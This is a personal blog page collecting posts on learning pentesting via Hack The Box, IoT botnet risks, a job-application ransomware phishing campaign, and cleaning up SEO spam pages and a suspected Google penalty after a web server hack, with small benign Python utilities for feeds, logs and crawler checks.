Earlier this year I was investigating the security of some things. They were black-boxes to me, and I figured I needed to learn about some offensive tools finally – so I set up a Kali Linux machine. Then I searched for the best way to learn about these tools; I read articles and books about pentesting. But I had no idea if these ‘things’ were vulnerable at all, and where to start. So I figured: Maybe it is better to attack something made vulnerable intentionally? There are vulnerable web applications, and you can download vulnerable virtual machines … but then I remembered I saw posts about hackthebox some months ago:

As an individual, you can complete a simple challenge to prove your skills and then create an account, allowing you to connect to our private network (HTB Labs) where several machines await for you to hack them.

Back then I had figured I would not pass this entry challenge nor hack any of these machines. It turned out otherwise, and it has been a very interesting experience so far – to learn about pentesting tools and methods on-the-fly. It has all been new, yet familiar in some sense.

Once I had been a so-called expert for certain technologies or products. But very often I became that expert by effectively reverse engineering the product a few days before I showed off that expertise. I had the exact same mindset and methods that are needed to attack the vulnerable applications of these boxes. I believe that in today’s world of interconnected systems, rapid technological change, [more buzz words here] every ‘subject matter expert’ is often actually reverse engineering – rather than applying knowledge acquired by proper training. I had certifications, too – but typically I never attended a course, but just took the exam after I had learned on the job.

On a few boxes I could use in-depth knowledge about protocols and technologies I had long-term experience with, especially Active Directory and Kerberos. However, I did not find those boxes easier to own than e.g. the Linux boxes where everything was new to me. With Windows boxes I focussed too much on things I knew, and overlooked the obvious. On Linux I was just a humble learner – and it seemed this made me find the vulnerability or misconfiguration faster.

I felt like time-travelling back to when I started ‘in IT’, back in the late 1990s. Now I can hardly believe that I went directly from staff scientist in a national research center to down-to-earth freelance IT consultant – supporting small businesses. With hindsight, I knew so little both about business and about how IT / Windows / computers are actually used in the real world. I tried out things, I reverse engineered, I was humbled by what remained to be learned. But on the other hand, I was delighted by how many real-life problems – for whose solution people were eager to pay – can be solved pragmatically by knowing only 80%. Writing academic papers had felt more like aiming at 130% all of the time – but before that you have to beg governmental entities to pay for it. Some academic colleagues were upset by my transition to the dark side, but I never saw this chasm: Experimental physics was about reverse engineering natural black-boxes – and sometimes about reverse engineering your predecessor’s enigmatic code. IT troubleshooting was about reverse engineering software. Theoretically it is all about logic and just zeros and ones, and you should be able to track down the developer who can explain that weird behavior. But in practice, as a freshly minted consultant without any ‘network’ you can hardly track down that developer in Redmond – so you make educated guesses and poke around the system.

I also noted eerie coincidences: In the months before being sucked into hackthebox’s black hole, I had been catching up on Python, C/C++, and Powershell – for productive purposes, for building something. But all of that is very useful now, for using or modifying exploits. In addition I realize that my typical console applications for simulations and data analysis are quite similar ‘in spirit’ to typical exploitation tools. Last year I also learned about design patterns and best practices in object-oriented software development – and I was about to over-do it. Maybe it’s good to throw in some Cowboy Coding for good measure!

But above all, hacking boxes is simply addictive in a way that cannot be fully explained. It is like reading novels about mysteries and secret passages. Maybe this is what computer games are to some people. Some commentators say that machines on pentesting platforms are more Capture-the-Flag-like (CTF) than real-world pentesting. It is true that some challenges have a ‘story line’ that takes you from one solved puzzle to the next one. To some extent a part of the challenge has to be fabricated as there are no real users to social engineer. But there are very real-world machines on hackthebox, e.g. requiring you to escalate from one object in a Windows domain to another.

And if you ever have seen what stuff is stored in clear text in the real world, or what passwords might be used ‘just for testing’ (and never changed) – then also the artificial guess-the-password challenges do not appear that unrealistic. I want to emphasize that I am not the one to make fun of weak test passwords and the like at all. More often than not I was the one whose job was to get something working / working again, under pressure. Sometimes it is not exactly easy to ‘get it working’ quickly, in an emergency, and at the same time considering all security implications of the ‘fix’ you have just applied – by thinking like an attacker. hackthebox is an excellent platform to learn that, so I cannot recommend it enough!

An article about hacking is not complete if it lacks a clichéd stock photo! I am searching for proper hacker’s attire now – this was my first find!

Internet of Things. Yet Another Gloomy Post.

Technically, I work with Things, as in the Internet of Things.

As outlined in Everything as a Service many formerly ‘dumb’ products – such as heating systems – become part of service offerings. A vital component of the new services is the technical connection of the Thing in your home to that Big Cloud. It seems every energy-related system has got its own Internet Gateway now: Our photovoltaic generator has one, our control unit has one, and the successor of our heat pump would have one, too. If vendors don’t bundle their offerings soon, we’ll end up with substantial electricity costs for powering a lot of separate gateways.

Experts have warned for years that the Internet of Things (IoT) comes with security challenges. Many Things’ owners still keep default or blank passwords, but the most impressive threat in my opinion is not hacking individual systems: Easily hacked things can be hijacked to serve as zombie clients in a botnet and launch a joint Distributed Denial of Service attack against a single target. Recently the blog of renowned security reporter Brian Krebs was taken down, most likely as an act of revenge by DDoSers (Crime is now offered as a service as well.). The attack – a tsunami of more than 600 Gbps – was described as one of the largest the internet had seen so far. Hosting provider OVH was subject to a record-breaking Tbps attack – launched via captured … [cue: hacker movie cliché] … cameras and digital video recorders on the internet.

I am about the millionth blogger ‘reporting’ on this, nothing new here. But the social media news about the DDoS attacks collided with another social media micro outrage  in my mind – about seemingly unrelated IT news: HP had to deal with not-so-positive reporting about its latest printer firmware changes and related policies –  when printers started to refuse to work with third-party cartridges. This seems to be a legal issue or has been presented as such, and I am not interested in that aspect here. What I find interesting is the clash of requirements: After the DDoS attacks many commentators said IoT vendors should be held accountable. They should be forced to update their stuff. On the other hand, end users should remain owners of the IT gadgets they have bought, so the vendor has no right to inflict any policies on them and restrict the usage of devices.

I can relate to both arguments. One of my main motivations ‘in renewable energy’ or ‘in home automation’ is to make users powerful and knowledgeable owners of their systems. On the other hand I have been ‘in security’ for a long time. And chasing firmware for IoT devices can be tough for end users.

It is a challenge to walk the tightrope really gracefully here: A printer may be traditionally considered an item we own whereas the internet router provided by the telco is theirs. So we can tinker with the printer’s inner workings as much as we want but we must not touch the router and let the telco do their firmware updates. But old-school devices are given more ‘intelligence’ and need to be connected to the internet to provide additional services – like that printer that allows you to print from your smartphone easily (Yes, but only if you register it at the printer manufacturer’s website before.). In addition, our home is not really our castle anymore. Our computers aren’t protected by the telco’s router / firmware all the time, but we work in different networks or in public places. All the Things we carry with us, someday smart wearable technology, will check in to different wireless and mobile networks – so their security bugs had better be fixed in time.

If IoT vendors should be held accountable and update their gadgets, they have to be given the option to do so. But if the device’s host tinkers with it, firmware upgrades might stall. In order to protect themselves from legal prosecution, vendors need to state in contracts that they are determined to push security updates and you cannot interfere with it. Security can never be enforced by technology only – for a device located at the end user’s premises.

It is a horrible scenario – and I am not sure if I refer to hacking or to proliferation of even more bureaucracy and over-regulation which should protect us from hacking but will add more hurdles for would-be start-ups that dare to sell hardware.

Theoretically a vendor should be able to separate the security-relevant features from nice-to-have updates. For example, in a similar way, in smart meters the functions used for metering (subject to metering law) should be separated from ‘features’ – the latter being subject to remote updates while the former must not. Sources told me that this is not an easy thing to achieve, at least not as easy as presented in the meters’ marketing brochure.

Linksys's Iconic Router

That iconic Linksys router – sold for more than 10 years (and a beloved test device of mine). Still popular because you could use open source firmware. Something that new security policies might seek to prevent.

If hardware security cannot be regulated, there might be more regulation of internet traffic. Internet Service Providers could be held accountable to remove compromised devices from their networks, for example after having notified the end user several times. Or smaller ISPs might be cut off by upstream providers. Somewhere in the chain of service providers we will have to deal with more monitoring and regulation, and in one way or other the playful days of the earlier internet (romanticized with hindsight, maybe) are over.

When I saw Krebs’ site going offline, I wondered what small businesses should do in general: His site is now DDoS-protected by Google’s Project Shield, a service offered to independent journalists and activists after his former pro-bono host could not deal with the load without affecting paying clients. So one of the Siren Servers I commented on critically so often came to the rescue! A small provider will not be able to deal with such attacks.

WordPress.com should be well-protected, I guess. I wonder if we will all end up hosting our websites at such major providers only, or ‘blog’ directly to Facebook, Google, or LinkedIn (now part of Microsoft) to be safe. I had advised against self-hosting WordPress myself: If you miss security updates you might jeopardize not only your website, but also others using the same shared web host. If you live on a platform like WordPress dot com or Google, you will complain from time to time about limited options or feature updates you don’t like – but you don’t have to care about security. I compare this to avoiding legal issues as an artisan selling hand-made items via Amazon or the like, in contrast to having to update your own shop’s business logic after every change in international tax law.

I have no conclusion to offer. Whenever I read news these days – on technology, energy, IT, anything in between, The Future in general – I feel reminded of this tension: Between being an independent neutral netizen and being plugged in to an inescapable matrix, maybe beneficial but Borg-like nonetheless.

Have I Seen the End of E-Mail?

Not that I desire it, but my recent encounters with ransomware make me wonder.

Some people in say, accounting or HR departments are forced to use e-mail with utmost paranoia. Hackers send alarmingly professional e-mails that look like invoices, job applications, or notifications of postal services. Clicking a link starts the download of malware that will encrypt all your data and ask for ransom.

Theoretically you could still find out if an e-mail was legit by cross-checking with open invoices, job ads, and expected mail. But what if hackers learn about your typical vendors from your business website or if they read your job ads? Then they would send plausible e-mails and might refer to specific codes, like the number of your job ad.

Until recently I figured that only medium or larger companies would be subject to targeted attacks. One major Austrian telco was the victim of a Denial of Service attack and challenged to pay ransom. (They didn’t, and were able to deal with the attack successfully.)

But then I have encountered a new level of ransomware attacks – targeting very small Austrian businesses by sending ‘expected’ job applications via e-mail:

  • The subject line was Job application as [a job that had been advertised weeks ago at a major governmental job service platform]
  • It was written in flawless German, using typical job applicant’s lingo as you learn in trainings.
  • It was addressed to the personal e-mail of the employee dealing with applications, not the public ‘info@’ address of the business
  • There was no attachment – so malware filters could not have found anything suspicious – but only a link to a shared cloud folder (‘…as the attachments are too large…’) – run by a legit European cloud company.
  • If you clicked the link (which you should not do unless you do this on a separate test-for-malware machine in a separate network) you saw a typical applicant’s photo and a second file – whose name translated to JobApplicationPDF.exe.

Suspicious features:

  • The EXE file should have triggered red lights. But it is not impossible that a job applicant creates a self-extracting archive, although I would compare that to wrapping your paper application in a box looking like a fake bomb.
  • Google’s Image Search showed that the photo has been stolen from a German photographer’s website – it was an example for a typical job applicant’s photo.
  • Both cloud and mail service used were less known ones. It has been reported that Dropbox had removed suspicious files so it seemed that attackers turned to alternative services. (Both mail and cloud provider reacted quickly and shut down the suspicious accounts)
  • The e-mail did not contain a phone number or street address, just the pointer to the cloud store: Possible but weird as an applicant should be eager to encourage communications via all channels. There might be ‘normal’ issues with accessing a cloud store link (e.g. link falsely blocked by corporate firewall) – so the HR department should be able to call the applicant.
  • Googling the body text of the e-mail gave one result only – a new blog entry of an IT professional quoting it at full length. The subject line was personalized to industry sector and a specific job ad – but the bulk of the text was not.
  • The non-public e-mail address of the HR person was googleable as the job ad plus contact data appeared on a job platform in a different language and country, without the small company’s consent of course. So both e-mail address and job description could be harvested automatically.

I also wonder if my Everything as a Service vision will provide a cure: More and more communication has been moved to messaging on social networks anyway – for convenience and avoiding false positive spam detection. E-Mail – powered by the old SMTP protocol with tacked on security features, run on decentralized mail servers – is being replaced by messaging happening within a big monolithic block of a system like Facebook messaging. Larger employers already require their applicants to submit their CVs using their web platforms, just as large corporations demand that their suppliers use their billing platform instead of sending invoices per e-mail.

What needs to be avoided is downloading an executable file and executing it in an environment not controlled by security policies. A large cloud provider might have a better chance to enforce security, and viewing or processing an ‘attachment’ could happen in the provider’s environment. As an alternative all ‘our’ devices might actually be part of a service and controlled more tightly by centrally set policies. Disclaimer: Not sure if I like that.

Iconic computer virus - from my very first small business website in 1997. Image credits mine.


Shortest Post Ever

… self-indulgent though, but just to add an update on the previous post.

My new personal website is  live:

elkement.subversiv.at

I have already redirected the root URLs of the precursor sites radices.net, subversiv.at and e-stangl.at. Now I am waiting for Google’s final verdict; then I am going to add the rewrite map for the 1:n map of old ASP files and new ‘posts’. This is also the pre-requisite for informing Google about the move officially.

The blog-like structure and standardized attributes like Open Graph meta tags and an XML sitemap should make my site more Google-likeable. With the new site – and one dedicated host name only – I finally added permanent redirects (HTTP 301). Before, I used temporary (HTTP 302) redirects to send requests from the root directory to subfolders, which (so the experts say) is not search-engine-friendly.

On the other hand the .at domain will not help: You can pick a certain country as preferred audience for a non-country domain, but I have to stick with Austria here, even if the language is set to English in all the proper places (I hope).

I have discovered that every WordPress.com Tag or Category has its own feed – just add /feed/ to the respective URLs – and I will make use of this in order to automate some of my link curation, like this. This list of physics postings has been created from this feed of selected postings:
https://elkement.wordpress.com/category/science-and-technology/physics/feed/
Of course this means re-tagging and re-categorizing here! Thanks WordPress for the Tags to Categories (and vice versa) Conversion Tools!
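Such link curation could be automated along the following lines. This is only a minimal sketch: the helper names `feed_url` and `parse_feed` and the sample feed content are made up for illustration, and it assumes the feed is plain RSS 2.0 with `<item>` elements carrying a `<title>` and a `<link>`.

```python
import xml.etree.ElementTree as ET


def feed_url(tag_or_category_url: str) -> str:
    """Append /feed/ to a WordPress.com tag or category URL."""
    return tag_or_category_url.rstrip("/") + "/feed/"


def parse_feed(rss_xml: str) -> list[tuple[str, str]]:
    """Return (title, link) pairs for every <item> of an RSS 2.0 document."""
    root = ET.fromstring(rss_xml)
    return [
        (item.findtext("title", default=""), item.findtext("link", default=""))
        for item in root.iter("item")
    ]


# Hypothetical sample feed; a real one would be downloaded from feed_url(...).
SAMPLE_RSS = """<rss version="2.0">
  <channel>
    <title>Example category</title>
    <item><title>First post</title><link>https://example.com/first/</link></item>
    <item><title>Second post</title><link>https://example.com/second/</link></item>
  </channel>
</rss>"""

for title, link in parse_feed(SAMPLE_RSS):
    print(f"{title}: {link}")
```

The parsing is kept separate from the download so that the list of links can be rebuilt from a saved copy of the feed as well.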

It is fun to watch my server’s log files more closely. Otherwise I would have missed that SQL injection attack attempt, trying to put spammy links on my website (into my database):

SQL injection by spammer-hackers

Looking for Patterns

Scott Adams, of Dilbert Fame, has a lot of useful advice in his autobiographical book How to Fail at Almost Everything and Still Win Big. He recommends looking for patterns in your life, without attempting to theorize about cause and effects. Learning from those patterns you could increase the chance that luck will hit you. I believe in increasing your options, so I can relate a lot to applying this approach to Life, the Universe and Everything.

It should be true in relation to the iconic example of patterns, that is: Web traffic. In this post I’ll try to briefly summarize what I have learned so far from most recent unfortunate events (This is PR speak for disaster). I have always been intrigued by web statistics, web servers’ log files, and the summaries shown by the free Google or Bing Webmaster Tools, but I started to follow the trends more closely after my other, non-WordPress web server had been hacked by the end of November.

How do you recognize that your site has been hacked?

This is very different from what you might expect from popular lore and movies. I downloaded the log files for my web server from time to time, and I just noticed that suddenly the size of the daily files was about twice the usual size. Inspecting the IP addresses which the traffic to my site came from I spotted a lot of hits by Google bot. Sites are indexed all the time, but I was baffled by the URLs – all pointing to pages that should not exist on my server. These URLs contained a long query string with all kinds of brand names, as you know them from spam comments or e-mails.
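The ‘log file suddenly twice as large’ observation can be turned into a simple check. The following is a sketch under assumptions: the function name `flag_spikes`, the threshold factor, and the seven-day window are illustrative choices, and the sizes are invented numbers rather than data from the hacked server.

```python
from statistics import median


def flag_spikes(daily_sizes: list[int], factor: float = 1.8, window: int = 7) -> list[int]:
    """Return the indices of days whose log size is at least `factor` times
    the median size of the preceding `window` days."""
    flagged = []
    for i in range(window, len(daily_sizes)):
        baseline = median(daily_sizes[i - window:i])
        if baseline > 0 and daily_sizes[i] >= factor * baseline:
            flagged.append(i)
    return flagged


# Invented daily log sizes in kilobytes; the last two days are roughly doubled.
sizes_kb = [100, 110, 95, 105, 100, 98, 102, 210, 205]
print(flag_spikes(sizes_kb))
```

Using the median of the preceding days rather than the mean keeps a single unusually busy day from masking the next one.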

This is an example line in the log file:

Spammy page on hacked web server, accessed by Google bot

This IP address belongs to a *.googlebot.com machine, as can be confirmed by resolving the name, e.g. using nslookup. The worrying fact was the status code 200 which means the page had indeed been there.
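The nslookup check can also be scripted. This is a sketch, not the procedure used above: the function name `is_googlebot` is made up, and the forward lookup that confirms the host name resolves back to the same IP address is an extra step added here as an assumption about what makes the check robust. The resolver functions are passed in as parameters so the logic can be tried without network access.

```python
import socket


def is_googlebot(ip, reverse=socket.gethostbyaddr, forward=socket.gethostbyname_ex):
    """Check whether `ip` reverse-resolves to a *.googlebot.com host name
    and whether that host name resolves back to the same IP address."""
    try:
        host = reverse(ip)[0]  # (hostname, aliases, addresses)
    except OSError:
        return False
    if not host.endswith(".googlebot.com"):
        return False
    try:
        return ip in forward(host)[2]  # list of IPv4 addresses for the host
    except OSError:
        return False
```

With the default arguments, `is_googlebot("…")` performs real DNS lookups for an address taken from the log file.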

A few days later this had changed to a 404, so the page did not exist anymore:

Spammy page removed from hacked web server, Google bot tries to access it.

The attack had happened on the weekend, and the pages had been removed immediately by my hosting provider.

To cross-check whether those pages had indeed been indexed by Google, I searched for site:[domain name]. This is a snippet from the search results – the spammers even borrowed the tag line of our legitimate site as a description (which I cropped from the screenshot here).

Spammy page in Google index

Overall these were just a bunch of different pages (ASP files) but Google recognizes every different query string, appended after the question mark, as a different URL. So suddenly Google had a lot more URLs to index and you could see a spike in web master tools:

Crawl stats after hack

There was also a warning message on the welcome page:

Google warning message about 404 errors

What to do?

Obviously the first thing is to delete the spammy pages and deal with whatever vulnerability had been exploited. This was done before I noticed the hack myself. But I am still in clean-up mode to get the spammy pages removed from Google’s index:

robots.txt. Using the site:[domain name] search I identified all the spammy pages and added them to the robots.txt file on my server. This file tells search engines which pages not to index. Fortunately you do not have to add each individual URL – adding the page (ending in .asp in this case) is sufficient.

But pages were still in the index after that, just the description was changed to:
A description for this result is not available because of this site’s robots.txt.

As far as I can tell, entries are still added to the index if somebody else links to your pages (actually, spammy pages on other hacked servers, see root cause analysis below). But as Google is not allowed to investigate the target as per robots.txt, it only adds the link without a description.
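The effect of such a robots.txt entry can be checked offline with Python’s standard `urllib.robotparser`. This is a minimal sketch: the page name `spampage.asp`, the domain `example.com`, and the helper `is_blocked` are hypothetical, and the standard-library parser only approximates how a real search engine interprets the file.

```python
from urllib.robotparser import RobotFileParser

# Hypothetical robots.txt: one Disallow line per spammy page, no query strings.
ROBOTS_TXT = """\
User-agent: *
Disallow: /spampage.asp
"""


def is_blocked(robots_txt: str, url: str, agent: str = "Googlebot") -> bool:
    """Return True if `agent` may not fetch `url` according to `robots_txt`."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return not parser.can_fetch(agent, url)


# Rules are matched as path prefixes, so every query-string variant is covered.
print(is_blocked(ROBOTS_TXT, "http://example.com/spampage.asp?dca=fake-belts"))
print(is_blocked(ROBOTS_TXT, "http://example.com/default.asp"))
```

The prefix matching is why listing the .asp page once is enough, without adding each individual URL.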

URL parameters. Since the spammy pages all use query strings and all strings have the same parameter – [page].asp?dca= in my case – I tried managing the URL parameters via web master tools. This is actually an option to let Google know if a query string should really denote another version of a page or if all query strings for one page should be indexed as a single page. E.g. I am using a query string called imgClicked to magnify an image when clicking in the top image, and I could tell Google that the clicked / unclicked image should not be counted as different URLs.

In the special case of the spammy pages I tried to tell Google that different dca values don’t make for a separate page (which would result in about 6 spammy URLs in the index instead of 1500) but this did not impact the gradual accumulation of indexed spammy pages.
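What ‘different dca values don’t make for a separate page’ means can be illustrated by collapsing URLs locally. This sketch only mimics the idea behind the URL parameters setting and says nothing about how Google implements it; the function names and example URLs are made up, while `dca` and `imgClicked` are the parameter names mentioned above.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def strip_params(url: str, ignored=("dca",)) -> str:
    """Remove the query parameters listed in `ignored` from `url`."""
    parts = urlsplit(url)
    kept = [
        (key, value)
        for key, value in parse_qsl(parts.query, keep_blank_values=True)
        if key not in ignored
    ]
    return urlunsplit(parts._replace(query=urlencode(kept)))


def count_distinct_pages(urls, ignored=("dca",)) -> int:
    """Count URLs that remain distinct once the ignored parameters are dropped."""
    return len({strip_params(url, ignored) for url in urls})


# Hypothetical spammy URLs: three query strings, but only two underlying pages.
spammy = [
    "http://example.com/a.asp?dca=fake-belts",
    "http://example.com/a.asp?dca=fake-bags",
    "http://example.com/b.asp?dca=fake-belts",
]
print(count_distinct_pages(spammy))
```

Applied to a crawl export, the same function would show how 1500 indexed URLs shrink to a handful of actual pages.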

Mind-numbing work. To get rid of all pages as fast as possible I also removed each. of. them. manually. via Google webmaster tools. This means:

  • Click on the URL from the search results, opening a new tab. This results in a 404.
  • Copy the URL from the address bar to web master tools in the form for removing the URL.
  • Click submit.
  • Repeat 1500 times.

I am now at about 500. Not all spammy pages that ever existed are displayed at once in the index, but about 10 are added every day. Where do they come from after the original pages had been deleted?

How was this hack actually supposed to work?

The legitimate pages had not been changed or vandalized but the hacker-spammers just placed additional pages on the server. I would never have noticed them had I not encountered Google’s indexing activities.

I was curious what those pages had looked like and I inspected Google’s cache, by searching for cache:[spammy URL]. The cached page consisted of:

  • Your typical junk of spammy text, otherwise I would be delighted about raw material for poetry.
  • A list of links to other spammy pages, most of them on my hacked server
  • An exact copy of the default page of this (legitimate) web site.

I haven’t investigated all those more than 1000 pages and the spammy links displayed on them, but I conjectured there have to be some outbound links to other – hacked – servers. Links will only be boosted if there are backlinks from seemingly independent web sites. Somehow this should make people buy something in a shady webshop at the end of a cascade of links.

After some weeks I was able to confirm this as Google web master tools now show external backlinks to my domain from other spammy pages on legitimate sites, mostly small businesses in the US. Many of them used the same provider that obviously had been hacked as well.

This explains where the gradual supply of spammy links to the index comes from: Google has followed the spammy links from the other hacked servers inbound to my server. It seems to take a while to clean this out even though all the other webmasters have removed their pages as well – I checked each. of. them. from the long list supplied by Google as a CSV file.

Had I not been hacked, I might never have become aware of the completely unrelated onslaught by Google itself, targeted at this blog. I reported on this in detail previously; here is just an update and a summary.

Edit, as I conclude from the comments that this was not clear: The following analysis is unrelated to the hack of the non-WordPress site – the hacked site had not been penalized so far by Google. But the blog you are reading right now was.

Symptoms of your site having been penalized by a search engine

Rapid decline of impressions. Webmaster tools show a period of 3 months maximum. I have checked the trend for all my sites now and then, but there was actually never anything that constituted a real trend. But for this blog page impressions went from a few hundred, often more than 1000 per day this summer to less than 10 per day now.

Page impressions Sept to Dec

Page impressions stayed at their all-time-low since last time, so just extend that graph to the right.

Comparison with sites that should rank much lower. Currently this blog has as many or as few impressions as my personal website e-stangl.at. Its Google pagerank is 1 – as compared to 3 for the WordPress blog; I only update it every quarter at maximum, and its word count is perhaps a thousandth of this blog’s.

My other two sites subversiv.at and radices.net score better although I update them only about once every 6 weeks, and I am pretty sure I violate best practices due to my creative mixing of languages, commenting on my own stuff, and/or curating enormous lists of outbound links.

It is ironic that Google has penalized this blog now, as my quality control has become more ruthless since autumn 2014. I had quite a number of posts in Drafts, with more than 1000 words each, edited, and spell-checked – and finally deleted all of them. The remaining posts were the ones requiring considerable research plus my poetry. This spam poem is one of my most popular posts by Google’s page impressions. So all theorizing is really futile and I should better watch the pattern emerge.

Identifying offending pages. I added an update to the previous post as I spotted the offending pages using the following method:

  • Identify your top performing pages by ranking pages in the list of search results by impressions or clicks.
  • Then order pages in the list of search results by page name. This is effectively ranking by date for blogs, and the list can be compared to the archive of all pages.
  • Make the time span covered by the Google tools smaller and smaller and check if one of your former top pages is suddenly vanishing from the list.

In my case these pages were:

  • A review of a new, a bit unconventional, textbook on quantum field theory and
  • a list of physics books, blogs and websites.
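The comparison of time windows described above can be sketched in a few lines. This is only an illustration under assumptions: it presumes the impressions per page for a long and a short time span are available as dictionaries (for example from an exported report), and the function name, page paths, and numbers are all invented.

```python
def vanished_pages(long_window: dict[str, int], short_window: dict[str, int],
                   top_n: int = 10) -> list[str]:
    """Return former top pages (by impressions in the long window) that no
    longer have any impressions in the short, recent window."""
    top = sorted(long_window, key=long_window.get, reverse=True)[:top_n]
    return [page for page in top if short_window.get(page, 0) == 0]


# Invented impression counts: three months versus the last month.
three_months = {
    "/": 900,
    "/2014/01/01/example-review/": 800,
    "/2012/05/01/obscure-early-post/": 3,
}
last_month = {
    "/": 40,
    "/2012/05/01/obscure-early-post/": 1,
}
print(vanished_pages(three_months, last_month, top_n=2))
```

Shrinking the short window step by step and rerunning the comparison narrows down the date on which a page dropped out.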

As a reader pointed out correctly this does not mean that the page has been deleted from the index – as you can confirm by searching for site:[Offending URL] explicitly or by adding a more specific search criterion, like adding elkement. I found that the results displayed for my offending pages are erratic: Sometimes, surprisingly, the page will still show up if I just use the title of the post; perhaps a consequence of me, owner of the site, being logged on to Google. Sometimes I need to add an additional keyword to move it to the top in search results again.

But anyway, even if the pages had not been deleted, they had been pushed back to search results page >10.

Something had been deleted from the index though. Here is the number of indexed pages over time, showing a decline starting at the time impressions were plummeting, too:

Pages indexed by Google for this blog as per writing of this post

I cannot see a similar effect for any of the other sites, and as far as I know it does not correlate with some Google update (Google has indicated a major update in March 2014 in the figure).

Find the root cause. Except for links on my own sites, and links on other blogs, my blog has no backlinks. As I learned in this research, backlinks from forums are often tagged nofollow so that search engines would not consider them spammy. This means links from your avatar commenting on other pages might not boost your blog, but might not hurt either.

The only ‘worthy’ backlink was from the page dedicated to that book I had reviewed – and that page linked exactly to the offending pages. My blog and the author’s page may look to Google as the tangle of cross-linked spammy pages hackers had misused my other web server for.

Do something about it? Conclusion? I replaced some of my links to the author’s site with a link to the book’s page on amazon.com. I moved one of the offending pages, the physics link list, over to radices.net – as I had planned to do so for quite a while in my eternal quest for tidy, consistent web sites. The page is still available on this blog, but not visible in the menu anymore.

But I will not ask the author to remove a valid backlink or remove my innocuous post; that seems like succumbing to the rules of a silly game.

What I learned from this episode is that one single page – perhaps one you don’t even consider important on the grand scale of things and your blog in particular – can boost a blog or drag it down. Which pages are the chosen ones is beyond unpredictable.

Ending on a more positive note, I currently encounter the boost effect for our German blog as we indulge in writing about the configuration of this gadget, the programmable control unit we use with our heat pump system. The device is very popular among ambitious DIY enthusiasts, and readers are obviously searching for it.

Programmable control unit

We are often linking to the vendor’s business page and manuals. I hope they will never link back to us.

I will just keep watching the patterns and reporting on my encounters. One of the next enigmas to be resolved: Why is the number of Google searches in my WordPress Stats much higher than the number of page impressions in Google Tools for that day, let alone clicks in Google Tools?

Update 2015-01-23: The answer was embarrassingly simple, and all my paranoia had been misguided. WordPress has migrated their hosted blogs to https only. All my traffic was hiding in the statistics for the https version which has to be added in Google Webmaster Tools as a separate website.

Waging a Battle against Sinister Algorithms

I have felt a disturbance of the force.

As you might expect from a blog about anything, this one has a weird collection of unrelated top pages and posts. My WordPress Blog Stats tell me I am obviously an internet authority on: how rodents get into kitchen appliances, about the physics of a spinning toy, about the history of the first heat pump, and most recently about how to sniff router traffic. But all those posts and topics are eclipsed by the meteoric rise of the single most popular ever article, which was a review of a book on a subfield in theoretical physics. I am not linking this post or quoting its title for reasons you might understand in a minute.

Checking out Google Webmaster Tools the effect is even more pronounced. Some months ago this textbook review attracted by far the most Google search impressions and clicks. Looking at the data from the perspective of a bot it might appear as if my blog had been created just to promote that book. Which is what I believe might actually have happened.

Concluding from historical versions of the book author’s website (on archive.org), the page impressions of my review started to surge when he put a backlink to my post on his page, sometime in spring this year.

But then in autumn this happened.

Page impressions for this blog on Google Webmaster Tools, Sept to Dec.

These are the impressions for searches from desktop computers (‘Web’), without image or mobile search. A page impression means that the link had been displayed on Google Search Results pages to some user. The curve does not change much if I remove the filter for Web.

For this period of three months, that article I Shall Not Quote is the top page in terms of impressions, right after the blog’s default page. I wondered about the reason for this steep decline as I usually don’t see any trend within three months on any of my sites.

If I decrease the time slot to the past month that infamous post suddenly vanishes from the top posts:

Page impressions and top pages in the last month

It was eradicated quickly – which can only be recognized when decreasing the time slot step-by-step. Within a few days at the end of October / beginning of November the entry seems to have been erased from the list of impressions.

I sorted the list of results shown above by the name of the page, not by impressions. Since WordPress posts’ names are prefixed with dates you would expect to see any of your posts in that list somewhere, some of them of course with very low scores. Actually, that list does also include obscure early posts from 2012 nobody ever clicks on.

The former top post, however, did not get a single impression anymore in the past month. I have highlighted the posts before and after in the list, and I have removed all filters for this one, thus also image and mobile search are taken into account. The post’s name started with /2013/12/22/:

Last month, top pages, recent top post missing

Checking the status of indexed pages in total confirms that links have been recently removed:

Index status of this blog

For my other sites and blogs this number is basically constant – as long as a website does not get hacked. As our business site actually has been a month ago. Yes, I only mention this in passing as I am less worried about that hack than about that mysterious penalizing of this blog.

I learned that your typical hack of a website is less spectacular than what hacker movies let you believe: If you are not a high-profile target, hacker-spammers leave your site intact, but place additional spammy pages with cross-links on your site to promote their links. You recognize this immediately by a surge of the number of URLs, of indexing activities, and – in case your hoster is as vigilant as mine – a peak in 404 not found errors after those spammy pages have been removed. This is the intermittent spike in spammy pages on our business page crawled by Google:

Crawl stats after hack

I used all tools at my disposal to clean up the mess the hackers caused – those pages actually have been indexed already. It will take a while until things like ‘fake Gucci belts’ will be removed from our top content keywords, after I removed the links from the index by editing robots.txt, and using the Google URL removal tool and the URL parameters tool (the latter comes in handy as the spammy pages have been indexed with various query strings, that is: parameters).

I had expected the worst but Google has not penalized me for that intermittent link spam attack (yet?). Numbers are now back to normal after a peak in queries for that fake brand stuff:

Queries back to normal after clean-up.

It was an awful lot of work to clean those URLs popping up again and again every day. I am willing to fight the sinister forces without too much whining. But Google’s harsh treatment of the post on this blog freaks me out. It is not only the blog post that was affected but also the pages for the tags, categories and archive entries. Nearly all of these pages – thus all the pages linking to the post – did not get a single impression anymore.

Google Webmaster Tools also tells me that the number of so-called Structured Data items for this blog has been reduced to nearly zero:

Structured data on this blog

Structured Data are useful for pages that show e.g. product reviews or recipes – anything that should have a pre-defined structure that might be presented according to that structure in Google search results, via nicely formatted snippets. My home-grown websites do not use those, but the spammer-hackers had used such data in their link spam pages – so on our business site we saw a peak in structured data at the time of the hack.

Obviously WP blogs use those by design. Our German blog is based on the same WP theme – but the number of structured data items there has been constant. So if anybody out there is using theme Twenty Eleven I would be happy to learn about your encounters with structured data.

I have read a lot: what I never wanted to know about search engine optimization. This also included hackers’ Black SEO. I recommend the book Spam Nation by renowned investigative reporter and IT security insider Brian Krebs, published recently. Whose page and book I will again not link.

What has happened? I can only speculate.

Spammers build networks of shady backlinks to promote their stuff. So common knowledge is of course that you should not buy links or create such network scams. Ironically, I have cross-linked all my own sites like hell for many years. Not for SEO purposes but in my eternal quest for organizing my stuff, keeping things separate, but adding the right pointers though, Raking the virtual Zen Garden etc. Never ever did this backfire. I was always concerned about the effect of my links and resources pages (links to other pages, mainly tech and science). Today my site radices.net which was once an early German predecessor of this blog is my big link dump – but still these massive link collections are not voted down by Google.

